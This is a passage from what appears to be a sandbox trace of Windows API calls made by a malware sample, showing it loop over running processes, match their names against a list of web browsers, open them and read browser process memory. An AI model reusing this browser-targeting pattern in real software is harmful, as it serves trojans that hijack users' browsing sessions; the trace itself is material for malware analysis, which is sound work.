	[0221.056] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0221.057] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x4fac
	[0221.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.057] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0221.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.057] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0221.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.057] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0221.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.058] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.058] NtQueryInformationProcess (in: ProcessHandle=0x4fac, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0221.058] ReadProcessMemory (in: hProcess=0x4fac, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0221.058] ReadProcessMemory (in: hProcess=0x4fac, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0221.058] ReadProcessMemory (in: hProcess=0x4fac, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0221.058] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0221.058] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0221.059] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x4fb0
	[0221.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.059] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0221.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.060] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0221.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.060] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0221.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.060] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.060] NtQueryInformationProcess (in: ProcessHandle=0x4fb0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0221.060] ReadProcessMemory (in: hProcess=0x4fb0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0221.061] ReadProcessMemory (in: hProcess=0x4fb0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0221.061] ReadProcessMemory (in: hProcess=0x4fb0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0221.061] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0221.061] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0221.062] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x4fb4
	[0221.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.062] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0221.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.062] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.062] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0221.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.063] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.063] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0221.064] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x4fb8
	[0221.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.064] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0221.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.064] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.065] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0221.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.065] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.065] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.066] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x4fbc
	[0221.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.066] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.066] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.067] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.067] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.067] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.068] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.068] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x4fc0
	[0221.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.069] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.069] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.069] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.070] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.070] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.071] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x4fc4
	[0221.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.071] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.071] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.071] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.072] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.072] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0221.073] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x4fc8
	[0221.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.073] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0221.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.073] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.073] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0221.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.074] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.074] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0221.075] CloseHandle (hObject=0x188) returned 1
	[0221.075] Sleep (dwMilliseconds=0x64) 
	[0221.178] GetCurrentProcessId () returned 0x110
	[0221.178] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0221.183] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0221.185] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0221.186] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0221.188] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x4fd4
	[0221.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.188] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0221.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.189] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.190] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0221.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.190] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.191] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0221.193] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x4fd8
	[0221.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.193] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0221.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.194] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.194] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0221.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.194] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.194] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0221.195] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x4fdc
	[0221.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.195] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0221.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.196] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.196] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0221.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.196] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.196] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0221.197] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x4fe0
	[0221.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.197] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0221.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.198] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.198] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0221.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.198] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.198] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0221.199] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x4fe4
	[0221.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.199] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0221.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.200] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.200] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0221.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.200] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.200] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0221.201] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x4fe8
	[0221.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.201] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0221.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.202] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.202] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0221.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.202] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.203] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0221.203] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x4fec
	[0221.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.203] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0221.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.204] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.204] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0221.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.204] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.204] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0221.205] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x4ff0
	[0221.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.205] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0221.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.205] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.206] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0221.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.206] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.206] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.207] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x4ff4
	[0221.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.207] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.207] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.208] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.208] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.208] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.209] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x4ff8
	[0221.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.209] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.209] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.210] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.210] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.210] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.211] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4ffc
	[0221.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.211] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.211] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.212] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.212] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.212] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.213] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x5004
	[0221.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.213] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.213] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.214] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.214] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.214] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.215] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x5008
	[0221.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.215] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.215] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.216] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.216] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.216] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.217] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x500c
	[0221.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.217] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
